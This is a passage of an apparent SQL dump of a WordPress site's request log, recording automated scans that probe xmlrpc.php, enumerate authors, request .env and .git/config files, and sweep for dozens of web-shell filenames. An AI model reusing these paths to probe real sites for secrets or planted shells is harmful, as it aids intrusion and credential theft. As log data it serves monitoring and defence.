10:42:23'),(7913,'https://amb18b.com/brand.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:24','2025-11-18 10:42:24'),(7914,'https://amb18b.com/makeasmtp.php?p=','13.74.149.244','Direct Access',1,'2025-11-18 10:42:26','2025-11-18 10:42:26'),(7915,'https://amb18b.com/wp-includes/customize/about.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:28','2025-11-18 10:42:28'),(7916,'https://amb18b.com/12.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:30','2025-11-18 10:42:30'),(7917,'https://amb18b.com/tiny.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:34','2025-11-18 10:42:34'),(7918,'https://amb18b.com/license.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:36','2025-11-18 10:42:36'),(7919,'https://amb18b.com/23.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:38','2025-11-18 10:42:38'),(7920,'https://amb18b.com/plugins/pwnd/as.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:40','2025-11-18 10:42:40'),(7921,'https://amb18b.com/post.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:42','2025-11-18 10:42:42'),(7922,'https://amb18b.com/n.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:46','2025-11-18 10:42:46'),(7923,'https://amb18b.com/xmlrpc.php','2a02:c207:2273:660::1','Direct Access',1,'2025-11-18 10:49:44','2025-11-18 10:49:44'),(7924,'https://amb18b.com/xmlrpc.php','103.42.117.165','Direct Access',1,'2025-11-18 11:47:33','2025-11-18 11:47:33'),(7925,'https://amb18b.com/xmlrpc.php','46.182.4.125','Direct Access',2,'2025-11-18 12:17:28','2025-11-18 12:17:11'),(7926,'https://amb18b.com/.git/config','134.199.173.228','Direct Access',1,'2025-11-18 12:34:41','2025-11-18 12:34:41'),(7927,'https://amb18b.com/.git/config','134.199.173.228','Direct Access',1,'2025-11-18 12:34:41','2025-11-18 12:34:41'),(7928,'https://amb18b.com/xmlrpc.php','103.216.221.55','Direct Access',1,'2025-11-18 12:53:53','2025-11-18 12:53:53'),(7929,'https://amb18b.com/xmlrpc.php','103.42.117.165','Direct Access',2,'2025-11-18 15:57:47','2025-11-18 15:17:44'),(7930,'https://amb18b.com/xmlrpc.php','193.181.210.95','Direct Access',8,'2025-11-18 16:01:56','2025-11-18 16:00:38'),(7931,'https://amb18b.com/xmlrpc.php','143.110.189.28','Direct Access',1,'2025-11-18 16:14:29','2025-11-18 16:14:29'),(7932,'https://amb18b.com/xmlrpc.php','2603:3:610f:6180::','Direct Access',1,'2025-11-18 16:44:12','2025-11-18 16:44:12'),(7933,'https://amb18b.com//wp-includes/wlwmanifest.xml','104.197.123.207','Direct Access',1,'2025-11-18 16:45:07','2025-11-18 16:45:07'),(7934,'https://amb18b.com//xmlrpc.php?rsd','104.197.123.207','Direct Access',1,'2025-11-18 16:45:07','2025-11-18 16:45:07'),(7935,'https://amb18b.com//?author=2','104.197.123.207','Direct Access',1,'2025-11-18 16:45:10','2025-11-18 16:45:10'),(7936,'https://amb18b.com//xmlrpc.php','104.197.123.207','Direct Access',1,'2025-11-18 16:45:12','2025-11-18 16:45:12'),(7937,'https://amb18b.com/xmlrpc.php','198.54.120.174','Direct Access',3,'2025-11-18 16:54:09','2025-11-18 16:54:01'),(7938,'https://amb18b.com/new/','136.107.93.58','Direct Access',1,'2025-11-18 16:57:40','2025-11-18 16:57:40'),(7939,'https://amb18b.com/backup/','136.107.93.58','Direct Access',1,'2025-11-18 16:57:41','2025-11-18 16:57:41'),(7940,'https://amb18b.com/wp/','136.107.93.58','Direct Access',1,'2025-11-18 16:57:43','2025-11-18 16:57:43'),(7941,'https://amb18b.com/blog/','136.107.93.58','Direct Access',1,'2025-11-18 16:57:44','2025-11-18 16:57:44'),(7942,'https://amb18b.com/old/','136.107.93.58','Direct Access',1,'2025-11-18 16:57:45','2025-11-18 16:57:45'),(7943,'https://amb18b.com/wordpress/','136.107.93.58','Direct Access',1,'2025-11-18 16:57:46','2025-11-18 16:57:46'),(7944,'https://amb18b.com/xmlrpc.php','160.153.175.147','Direct Access',1,'2025-11-18 17:05:18','2025-11-18 17:05:18'),(7945,'https://amb18b.com/xmlrpc.php','217.154.198.74','Direct Access',1,'2025-11-18 17:16:43','2025-11-18 17:16:43'),(7946,'https://amb18b.com/xmlrpc.php','171.244.0.91','Direct Access',1,'2025-11-18 17:28:46','2025-11-18 17:28:46'),(7947,'https://amb18b.com/xmlrpc.php','108.179.219.178','Direct Access',2,'2025-11-18 18:56:17','2025-11-18 18:13:44'),(7948,'https://amb18b.com/xmlrpc.php','89.252.169.182','Direct Access',5,'2025-11-18 18:26:07','2025-11-18 18:23:35'),(7949,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','83.142.209.63','Direct Access',1,'2025-11-18 19:03:29','2025-11-18 19:03:29'),(7950,'https://amb18b.com/xmlrpc.php','95.154.198.138','Direct Access',1,'2025-11-18 19:35:40','2025-11-18 19:35:40'),(7951,'https://amb18b.com/xmlrpc.php','2406:5900:3:5069:6c8f:3710:4f3c:c79e','Direct Access',1,'2025-11-18 20:08:48','2025-11-18 20:08:48'),(7952,'https://amb18b.com/xmlrpc.php','46.182.4.125','Direct Access',2,'2025-11-18 20:09:28','2025-11-18 20:09:12'),(7953,'https://amb18b.com/about.php?key=EnigmaCyberSecurity','208.89.241.198','Direct Access',1,'2025-11-18 20:35:59','2025-11-18 20:35:59'),(7954,'https://amb18b.com/uploaded_script.php','199.101.136.157','Direct Access',1,'2025-11-18 20:36:02','2025-11-18 20:36:02'),(7955,'https://amb18b.com/wp-admin/maint/fie.php','208.89.240.247','Direct Access',1,'2025-11-18 20:36:05','2025-11-18 20:36:05'),(7956,'https://amb18b.com/xmlrpc.php','2603:3:6105:e00::','Direct Access',1,'2025-11-18 20:51:18','2025-11-18 20:51:18'),(7957,'https://amb18b.com/xmlrpc.php','192.64.112.17','Direct Access',2,'2025-11-18 21:12:31','2025-11-18 21:12:13'),(7958,'https://amb18b.com/xmlrpc.php','143.44.168.215','Direct Access',1,'2025-11-18 21:25:44','2025-11-18 21:25:44'),(7959,'https://amb18b.com/xmlrpc.php','184.168.126.97','Direct Access',1,'2025-11-18 21:38:14','2025-11-18 21:38:14'),(7960,'https://amb18b.com/xmlrpc.php?rsd','182.77.79.171','https://amb18b.com/',1,'2025-11-18 21:40:51','2025-11-18 21:40:51'),(7961,'https://amb18b.com/xmlrpc.php','143.198.87.186','Direct Access',1,'2025-11-18 21:50:08','2025-11-18 21:50:08'),(7962,'https://amb18b.com/xmlrpc.php','129.150.46.7','Direct Access',1,'2025-11-18 22:17:01','2025-11-18 22:17:01'),(7963,'https://amb18b.com/xmlrpc.php','64.227.76.238','Direct Access',1,'2025-11-18 22:25:56','2025-11-18 22:25:56'),(7964,'https://amb18b.com/xmlrpc.php','103.159.85.119','Direct Access',3,'2025-11-18 23:06:36','2025-11-18 23:06:11'),(7965,'https://amb18b.com/xmlrpc.php','27.74.251.194','Direct Access',1,'2025-11-18 23:26:12','2025-11-18 23:26:12'),(7966,'https://amb18b.com/xmlrpc.php','78.157.49.100','Direct Access',1,'2025-11-18 23:44:41','2025-11-18 23:44:41'),(7967,'https://amb18b.com/xmlrpc.php','103.205.141.156','Direct Access',2,'2025-11-19 00:47:31','2025-11-19 00:08:28'),(7968,'https://amb18b.com/xmlrpc.php','212.147.5.172','Direct Access',1,'2025-11-19 00:34:33','2025-11-19 00:34:33'),(7969,'https://amb18b.com/xmlrpc.php','201.46.112.136','Direct Access',6,'2025-11-19 00:35:00','2025-11-19 00:34:48'),(7970,'https://amb18b.com/xmlrpc.php','194.233.93.96','Direct Access',3,'2025-11-19 01:04:53','2025-11-19 01:03:50'),(7971,'https://amb18b.com/xmlrpc.php','66.179.80.51','Direct Access',2,'2025-11-19 01:16:48','2025-11-19 01:16:32'),(7972,'https://amb18b.com/xmlrpc.php','180.93.137.9','Direct Access',1,'2025-11-19 01:30:27','2025-11-19 01:30:27'),(7973,'https://amb18b.com/xmlrpc.php','103.38.161.197','Direct Access',1,'2025-11-19 01:55:21','2025-11-19 01:55:21'),(7974,'https://amb18b.com/xmlrpc.php','103.171.92.209','Direct Access',1,'2025-11-19 02:51:46','2025-11-19 02:51:46'),(7975,'https://amb18b.com/xmlrpc.php','162.241.224.32','Direct Access',1,'2025-11-19 03:07:46','2025-11-19 03:07:46'),(7976,'https://amb18b.com/form.php','50.199.140.229','https://www.bing.com/',1,'2025-11-19 03:45:23','2025-11-19 03:45:23'),(7977,'https://amb18b.com/aa.php','51.198.235.214','https://www.google.de/',1,'2025-11-19 03:45:27','2025-11-19 03:45:27'),(7978,'https://amb18b.com/abcd.php','69.39.157.203','https://www.yahoo.com/',1,'2025-11-19 03:45:30','2025-11-19 03:45:30'),(7979,'https://amb18b.com/admin.php','79.11.3.41','https://www.yahoo.com/',1,'2025-11-19 03:45:32','2025-11-19 03:45:32'),(7980,'https://amb18b.com/.__info.php','122.190.39.52','https://www.bing.com/',1,'2025-11-19 03:45:34','2025-11-19 03:45:34'),(7981,'https://amb18b.com/.bod/.ll/ss.php','1.142.136.76','https://www.bing.com/',1,'2025-11-19 03:45:36','2025-11-19 03:45:36'),(7982,'https://amb18b.com/.well-known/.qiodetme.php','141.223.0.121','https://www.google.fr/',1,'2025-11-19 03:45:38','2025-11-19 03:45:38'),(7983,'https://amb18b.com/info.php','128.205.216.101','https://www.yahoo.com/',1,'2025-11-19 03:45:40','2025-11-19 03:45:40'),(7984,'https://amb18b.com/xmlrpc.php','215.97.90.153','https://www.google.co.uk/',1,'2025-11-19 03:45:42','2025-11-19 03:45:42'),(7985,'https://amb18b.com/ALFA_DATA/admin.php','193.200.60.1','https://www.yahoo.com/',1,'2025-11-19 03:45:44','2025-11-19 03:45:44'),(7986,'https://amb18b.com/aaa.php','18.85.138.5','https://www.google.de/',1,'2025-11-19 03:45:46','2025-11-19 03:45:46'),(7987,'https://amb18b.com/about.php','94.254.165.95','https://www.bing.com/',1,'2025-11-19 03:45:47','2025-11-19 03:45:47'),(7988,'https://amb18b.com/admin/admin.php','61.136.208.103','https://www.yahoo.com/',1,'2025-11-19 03:45:49','2025-11-19 03:45:49'),(7989,'https://amb18b.com/adminfuns.php','128.205.179.47','https://www.bing.com/',1,'2025-11-19 03:45:51','2025-11-19 03:45:51'),(7990,'https://amb18b.com/akcc.php','15.213.22.150','https://www.google.fr/',1,'2025-11-19 03:45:54','2025-11-19 03:45:54'),(7991,'https://amb18b.com/alfa.php','169.118.157.114','https://duckduckgo.com/',1,'2025-11-19 03:45:55','2025-11-19 03:45:55'),(7992,'https://amb18b.com/build.php','7.98.131.22','https://www.google.co.uk/',1,'2025-11-19 03:45:57','2025-11-19 03:45:57'),(7993,'https://amb18b.com/buy.php','112.80.196.158','https://duckduckgo.com/',1,'2025-11-19 03:45:59','2025-11-19 03:45:59'),(7994,'https://amb18b.com/chosen.php','110.16.222.160','https://www.yahoo.com/',1,'2025-11-19 03:46:01','2025-11-19 03:46:01'),(7995,'https://amb18b.com/classwithtostring.php','250.119.132.186','https://www.google.com/',1,'2025-11-19 03:46:03','2025-11-19 03:46:03'),(7996,'https://amb18b.com/default.php','161.50.18.168','https://duckduckgo.com/',1,'2025-11-19 03:46:04','2025-11-19 03:46:04'),(7997,'https://amb18b.com/edit.php','75.233.193.107','https://www.google.de/',1,'2025-11-19 03:46:06','2025-11-19 03:46:06'),(7998,'https://amb18b.com/file.php','169.220.241.182','https://www.google.co.uk/',1,'2025-11-19 03:46:08','2025-11-19 03:46:08'),(7999,'https://amb18b.com/filemanager.php','93.172.137.48','https://www.google.com/',1,'2025-11-19 03:46:10','2025-11-19 03:46:10'),(8000,'https://amb18b.com/flower.php','173.206.170.146','https://www.google.de/',1,'2025-11-19 03:46:12','2025-11-19 03:46:12'),(8001,'https://amb18b.com/function/function.php','47.10.246.170','https://duckduckgo.com/',1,'2025-11-19 03:46:15','2025-11-19 03:46:15'),(8002,'https://amb18b.com/go.php','194.190.123.185','https://www.google.co.uk/',1,'2025-11-19 03:46:17','2025-11-19 03:46:17'),(8003,'https://amb18b.com/images/index.php','2.49.151.45','https://www.yahoo.com/',1,'2025-11-19 03:46:18','2025-11-19 03:46:18'),(8004,'https://amb18b.com/images/images/about.php','160.109.136.1','https://duckduckgo.com/',1,'2025-11-19 03:46:22','2025-11-19 03:46:22'),(8005,'https://amb18b.com/ioxi-o.php','8.108.200.209','https://www.google.com/',1,'2025-11-19 03:46:24','2025-11-19 03:46:24'),(8006,'https://amb18b.com/mari.php','97.30.9.138','https://www.google.com/',1,'2025-11-19 03:46:26','2025-11-19 03:46:26'),(8007,'https://amb18b.com/moon.php','251.100.7.3','https://www.google.fr/',1,'2025-11-19 03:46:28','2025-11-19 03:46:28'),(8008,'https://amb18b.com/nc4.php','218.230.121.30','https://duckduckgo.com/',1,'2025-11-19 03:46:30','2025-11-19 03:46:30'),(8009,'https://amb18b.com/wp-admin/css/colors/blue/index.php','119.205.96.251','https://www.google.fr/',1,'2025-11-19 03:46:35','2025-11-19 03:46:35'),(8010,'https://amb18b.com/wp-includes/style-engine/index.php','77.7.9.197','https://duckduckgo.com/',1,'2025-11-19 03:46:42','2025-11-19 03:46:42'),(8011,'https://amb18b.com/cgi-bin/','212.31.186.194','https://www.google.de/',1,'2025-11-19 03:46:43','2025-11-19 03:46:43'),(8012,'https://amb18b.com/xleet.php','222.146.188.34','https://www.google.co.uk/',1,'2025-11-19 03:46:45','2025-11-19 03:46:45'),(8013,'https://amb18b.com/wp-admin/includes/','231.164.43.61','https://www.google.com/',1,'2025-11-19 03:46:47','2025-11-19 03:46:47'),(8014,'https://amb18b.com/wp-good.php','3.52.187.255','https://www.google.de/',1,'2025-11-19 03:46:52','2025-11-19 03:46:52'),(8015,'https://amb18b.com/wp-includes/Text/Diff/Renderer/','153.146.74.169','https://www.google.fr/',1,'2025-11-19 03:46:54','2025-11-19 03:46:54'),(8016,'https://amb18b.com/wp-includes/style-engine/','242.245.183.24','https://duckduckgo.com/',1,'2025-11-19 03:46:56','2025-11-19 03:46:56'),(8017,'https://amb18b.com/xmrlpc.php','141.32.167.137','https://www.bing.com/',1,'2025-11-19 03:46:58','2025-11-19 03:46:58'),(8018,'https://amb18b.com/asasx.php','100.217.177.3','https://www.google.co.uk/',1,'2025-11-19 03:47:01','2025-11-19 03:47:01'),(8019,'https://amb18b.com/autoload_classmap.php','79.237.106.44','https://www.bing.com/',1,'2025-11-19 03:47:03','2025-11-19 03:47:03'),(8020,'https://amb18b.com/cong.php','139.0.39.194','https://duckduckgo.com/',1,'2025-11-19 03:47:05','2025-11-19 03:47:05'),(8021,'https://amb18b.com/file2.php','104.120.123.64','https://www.yahoo.com/',1,'2025-11-19 03:47:07','2025-11-19 03:47:07'),(8022,'https://amb18b.com/wp-includes/IXR/','181.224.66.102','https://www.google.co.uk/',1,'2025-11-19 03:47:16','2025-11-19 03:47:16'),(8023,'https://amb18b.com/wp-includes/block-supports/','100.188.90.40','https://www.google.co.uk/',1,'2025-11-19 03:47:18','2025-11-19 03:47:18'),(8024,'https://amb18b.com/wp-includes/fonts/','3.162.187.116','https://duckduckgo.com/',1,'2025-11-19 03:47:20','2025-11-19 03:47:20'),(8025,'https://amb18b.com/wp-includes/fonts/index.php','60.156.135.9','https://www.google.com/',1,'2025-11-19 03:47:22','2025-11-19 03:47:22'),(8026,'https://amb18b.com/wp-includes/js/crop/','16.35.132.87','https://www.google.de/',1,'2025-11-19 03:47:24','2025-11-19 03:47:24'),(8027,'https://amb18b.com/wp-includes/rest-api/','130.202.238.117','https://www.google.de/',1,'2025-11-19 03:47:26','2025-11-19 03:47:26'),(8028,'https://amb18b.com/wp-includes/widgets/','14.214.140.123','https://duckduckgo.com/',1,'2025-11-19 03:47:28','2025-11-19 03:47:28'),(8029,'https://amb18b.com/xmlrpc.php','50.87.144.184','Direct Access',1,'2025-11-19 03:58:56','2025-11-19 03:58:56'),(8030,'https://amb18b.com/xmlrpc.php','217.131.14.2','Direct Access',5,'2025-11-19 04:43:04','2025-11-19 04:41:57'),(8031,'https://amb18b.com//wp-includes/wlwmanifest.xml','208.84.101.154','Direct Access',1,'2025-11-19 04:46:35','2025-11-19 04:46:35'),(8032,'https://amb18b.com//xmlrpc.php?rsd','208.84.101.154','Direct Access',1,'2025-11-19 04:46:36','2025-11-19 04:46:36'),(8033,'https://amb18b.com//?author=2','208.84.101.154','Direct Access',1,'2025-11-19 04:46:38','2025-11-19 04:46:38'),(8034,'https://amb18b.com//xmlrpc.php','208.84.101.154','Direct Access',1,'2025-11-19 04:46:39','2025-11-19 04:46:39'),(8035,'https://amb18b.com/xmlrpc.php','129.232.138.35','Direct Access',1,'2025-11-19 04:49:25','2025-11-19 04:49:25'),(8036,'https://amb18b.com/xmlrpc.php?rsd','57.141.0.54','Direct Access',1,'2025-11-19 04:54:35','2025-11-19 04:54:35'),(8037,'https://amb18b.com/xmlrpc.php','103.185.74.28','Direct Access',6,'2025-11-19 05:07:02','2025-11-19 05:05:54'),(8038,'https://amb18b.com/aiman.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:31','2025-11-19 06:14:31'),(8039,'https://amb18b.com/error.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:32','2025-11-19 06:14:32'),(8040,'https://amb18b.com/NH19T66T.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:33','2025-11-19 06:14:33'),(8041,'https://amb18b.com/rei.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:34','2025-11-19 06:14:34'),(8042,'https://amb18b.com/666.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:35','2025-11-19 06:14:35'),(8043,'https://amb18b.com/777.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:36','2025-11-19 06:14:36'),(8044,'https://amb18b.com/888.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:37','2025-11-19 06:14:37'),(8045,'https://amb18b.com/555.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:38','2025-11-19 06:14:38'),(8046,'https://amb18b.com/333.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:39','2025-11-19 06:14:39'),(8047,'https://amb18b.com/zeal.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:40','2025-11-19 06:14:40'),(8048,'https://amb18b.com/file.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:42','2025-11-19 06:14:42'),(8049,'https://amb18b.com/file1.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:45','2025-11-19 06:14:45'),(8050,'https://amb18b.com/file2.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:46','2025-11-19 06:14:46'),(8051,'https://amb18b.com/file5.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:49','2025-11-19 06:14:49'),(8052,'https://amb18b.com/file17.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:52','2025-11-19 06:14:52'),(8053,'https://amb18b.com/file32.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:53','2025-11-19 06:14:53'),(8054,'https://amb18b.com/filesss.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:54','2025-11-19 06:14:54'),(8055,'https://amb18b.com/file9.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:55','2025-11-19 06:14:55'),(8056,'https://amb18b.com/file13.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:56','2025-11-19 06:14:56'),(8057,'https://amb18b.com/file3.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:57','2025-11-19 06:14:57'),(8058,'https://amb18b.com/atomlib.php','48.210.231.218','Direct Access',1,'2025-11-19 06:14:59','2025-11-19 06:14:59'),(8059,'https://amb18b.com/efile.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:00','2025-11-19 06:15:00'),(8060,'https://amb18b.com/file18.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:02','2025-11-19 06:15:02'),(8061,'https://amb18b.com/520.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:04','2025-11-19 06:15:04'),(8062,'https://amb18b.com/031.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:05','2025-11-19 06:15:05'),(8063,'https://amb18b.com/file7.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:06','2025-11-19 06:15:06'),(8064,'https://amb18b.com/file4.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:07','2025-11-19 06:15:07'),(8065,'https://amb18b.com/2%25.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:09','2025-11-19 06:15:09'),(8066,'https://amb18b.com/1%25.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:10','2025-11-19 06:15:10'),(8067,'https://amb18b.com/wp-freya.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:11','2025-11-19 06:15:11'),(8068,'https://amb18b.com/keu.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:13','2025-11-19 06:15:13'),(8069,'https://amb18b.com/file88.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:14','2025-11-19 06:15:14'),(8070,'https://amb18b.com/0%25.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:15','2025-11-19 06:15:15'),(8071,'https://amb18b.com/lock360.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:16','2025-11-19 06:15:16'),(8072,'https://amb18b.com/jmfi2.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:17','2025-11-19 06:15:17'),(8073,'https://amb18b.com/class.1.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:19','2025-11-19 06:15:19'),(8074,'https://amb18b.com/an.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:20','2025-11-19 06:15:20'),(8075,'https://amb18b.com/fs.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:21','2025-11-19 06:15:21'),(8076,'https://amb18b.com/CLA.php','48.210.231.218','Direct Access',2,'2025-11-19 06:16:08','2025-11-19 06:15:23'),(8077,'https://amb18b.com/gfile.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:24','2025-11-19 06:15:24'),(8078,'https://amb18b.com/file6.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:25','2025-11-19 06:15:25'),(8079,'https://amb18b.com/eauu.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:27','2025-11-19 06:15:27'),(8080,'https://amb18b.com/we.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:28','2025-11-19 06:15:28'),(8081,'https://amb18b.com/fe5.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:30','2025-11-19 06:15:30'),(8082,'https://amb18b.com/cccc.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:31','2025-11-19 06:15:31'),(8083,'https://amb18b.com/gmo.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:32','2025-11-19 06:15:32'),(8084,'https://amb18b.com/shell1.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:33','2025-11-19 06:15:33'),(8085,'https://amb18b.com/gm.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:34','2025-11-19 06:15:34'),(8086,'https://amb18b.com/lala.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:35','2025-11-19 06:15:35'),(8087,'https://amb18b.com/hexx.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:37','2025-11-19 06:15:37'),(8088,'https://amb18b.com/444.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:38','2025-11-19 06:15:38'),(8089,'https://amb18b.com/a2.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:39','2025-11-19 06:15:39'),(8090,'https://amb18b.com/cfile.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:40','2025-11-19 06:15:40'),(8091,'https://amb18b.com/lv.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:41','2025-11-19 06:15:41'),(8092,'https://amb18b.com/goat.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:42','2025-11-19 06:15:42'),(8093,'https://amb18b.com/222.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:43','2025-11-19 06:15:43'),(8094,'https://amb18b.com/aa.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:44','2025-11-19 06:15:44'),(8095,'https://amb18b.com/vast.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:45','2025-11-19 06:15:45'),(8096,'https://amb18b.com/yanki.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:47','2025-11-19 06:15:47'),(8097,'https://amb18b.com/bolt.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:49','2025-11-19 06:15:49'),(8098,'https://amb18b.com/nfile.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:50','2025-11-19 06:15:50'),(8099,'https://amb18b.com/ilex.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:52','2025-11-19 06:15:52'),(8100,'https://amb18b.com/des.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:53','2025-11-19 06:15:53'),(8101,'https://amb18b.com/ext.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:55','2025-11-19 06:15:55'),(8102,'https://amb18b.com/axx.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:56','2025-11-19 06:15:56'),(8103,'https://amb18b.com/yasnu.php','48.210.231.218','Direct Access',1,'2025-11-19 06:15:58','2025-11-19 06:15:58'),(8104,'https://amb18b.com/new4.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:00','2025-11-19 06:16:00'),(8105,'https://amb18b.com/ava.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:01','2025-11-19 06:16:01'),(8106,'https://amb18b.com/ioxi2.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:02','2025-11-19 06:16:02'),(8107,'https://amb18b.com/gfile1.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:03','2025-11-19 06:16:03'),(8108,'https://amb18b.com/ffile.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:04','2025-11-19 06:16:04'),(8109,'https://amb18b.com/rsnu.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:05','2025-11-19 06:16:05'),(8110,'https://amb18b.com/.well-known/acme-challenge/about.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:07','2025-11-19 06:16:07'),(8111,'https://amb18b.com/default.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:09','2025-11-19 06:16:09'),(8112,'https://amb18b.com/dfre.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:10','2025-11-19 06:16:10'),(8113,'https://amb18b.com/pp.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:11','2025-11-19 06:16:11'),(8114,'https://amb18b.com/13.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:13','2025-11-19 06:16:13'),(8115,'https://amb18b.com/usep.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:14','2025-11-19 06:16:14'),(8116,'https://amb18b.com/3.php','48.210.231.218','Direct Access',1,'2025-11-19 06:16:15','2025-11-19 06:16:15'),(8117,'https://amb18b.com/xmlrpc.php','92.205.186.4','Direct Access',4,'2025-11-19 06:50:34','2025-11-19 06:49:18'),(8118,'https://amb18b.com/xmlrpc.php','212.147.5.172','Direct Access',1,'2025-11-19 07:00:06','2025-11-19 07:00:06'),(8119,'https://amb18b.com/xmlrpc.php','89.233.105.203','Direct Access',1,'2025-11-19 07:39:02','2025-11-19 07:39:02'),(8120,'https://amb18b.com/xmlrpc.php','45.119.84.18','Direct Access',1,'2025-11-19 08:15:50','2025-11-19 08:15:50'),(8121,'https://amb18b.com/xmlrpc.php','206.189.151.95','Direct Access',1,'2025-11-19 08:58:02','2025-11-19 08:58:02'),(8122,'https://amb18b.com/xmlrpc.php','91.121.36.122','Direct Access',1,'2025-11-19 09:12:43','2025-11-19 09:12:43'),(8123,'https://amb18b.com/xmlrpc.php','2603:3:6105:e00::','Direct Access',1,'2025-11-19 09:40:34','2025-11-19 09:40:34'),(8124,'https://amb18b.com//wp-includes/ID3/license.txt','178.128.208.21','Direct Access',1,'2025-11-19 09:56:37','2025-11-19 09:56:37'),(8125,'https://amb18b.com/?author=2','178.128.208.21','Direct Access',1,'2025-11-19 09:56:39','2025-11-19 09:56:39'),(8126,'https://amb18b.com/xmlrpc.php','178.128.208.21','Direct Access',1,'2025-11-19 09:56:40','2025-11-19 09:56:40'),(8127,'https://amb18b.com/xmlrpc.php','72.60.27.250','Direct Access',1,'2025-11-19 10:09:22','2025-11-19 10:09:22'),(8128,'https://amb18b.com/xmlrpc.php','103.216.221.55','Direct Access',1,'2025-11-19 10:24:53','2025-11-19 10:24:53'),(8129,'https://amb18b.com/xmlrpc.php','8.218.212.177','Direct Access',1,'2025-11-19 11:20:53','2025-11-19 11:20:53'),(8130,'https://amb18b.com/xmlrpc.php','132.145.196.107','Direct Access',1,'2025-11-19 12:29:01','2025-11-19 12:29:01'),(8131,'https://amb18b.com/xmlrpc.php','103.178.231.51','Direct Access',4,'2025-11-19 13:44:49','2025-11-19 13:43:52'),(8132,'https://amb18b.com/xmlrpc.php','212.147.5.172','Direct Access',1,'2025-11-19 13:47:50','2025-11-19 13:47:50'),(8133,'https://amb18b.com/xmlrpc.php','122.117.102.125','Direct Access',4,'2025-11-19 14:11:15','2025-11-19 14:10:48'),(8134,'https://amb18b.com/.env','45.148.10.165','Direct Access',1,'2025-11-19 14:28:46','2025-11-19 14:28:46'),(8135,'https://amb18b.com/app/.env','45.148.10.165','Direct Access',1,'2025-11-19 14:28:47','2025-11-19 14:28:47'),(8136,'https://amb18b.com/config/.env','45.148.10.165','Direct Access',1,'2025-11-19 14:28:48','2025-11-19 14:28:48'),(8137,'https://amb18b.com/api/.env','45.148.10.165','Direct 